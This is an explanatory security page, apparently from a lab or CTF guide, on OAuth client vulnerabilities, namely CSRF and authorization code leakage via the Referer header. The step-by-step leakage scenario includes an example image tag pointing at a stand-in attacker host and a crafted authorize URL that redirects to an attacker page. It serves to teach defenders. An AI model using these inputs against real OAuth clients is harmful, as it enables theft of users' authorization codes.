Client Vulnerabilities

The purpose of this section is to describe common vulnerabilities found in OAuth Client implementations.

• Cross-Site Request Forgery

  • Results in the Resource Owner having the Client application connected with the Attacker's authorization context.

    • See the following challenge for a proof of concept.

• Authorization Code Leakage via Referer HTTP Header

  • This attack scenario is a bit contrived as it requires several components in order to successfully execute.

    • 1) The Authorization Server is loosely validating the Client's redirect_uri to only ensure the subdomain matches, e.g. https://my-client.com/oauth/callback will still work even if https://my-client.com/* is provided.

    • 2) The attacker will need to be able to create a page on the target site that is able to host HTML content. An example is they need to be able to embed an image pointing to a third party site, e.g. <img src='http://attacker.com'>

      • Think of blogging software or similar software that include WSYISWYG editors which allow users to embed images hosted on a third party website.

    • 3) Attacker sends Victim a link to initiate the OAuth flow with the redirect_uri pointing back to the attacker's controlled sub-page, e.g. https://oauthprovider.com/authorize?response_type=code&client_id=abc&scope=blabla&redirect_uri=https://my-client.com/usergeneratedcontent/attacker.html

    • 4) The Victim clicks on the link and the OAuth flow eventually ends up at the following URL: https://my-client.com/usergeneratedcontent/attacker.html?code=access_token

    • 5) The URL above may not seem dangerous as the Attacker may not have access to server-side logs, however as the browser will attempt to load the image on the attacker's controlled page, the current URL will be included in the Referer HTTP Header , thus leaking the access token.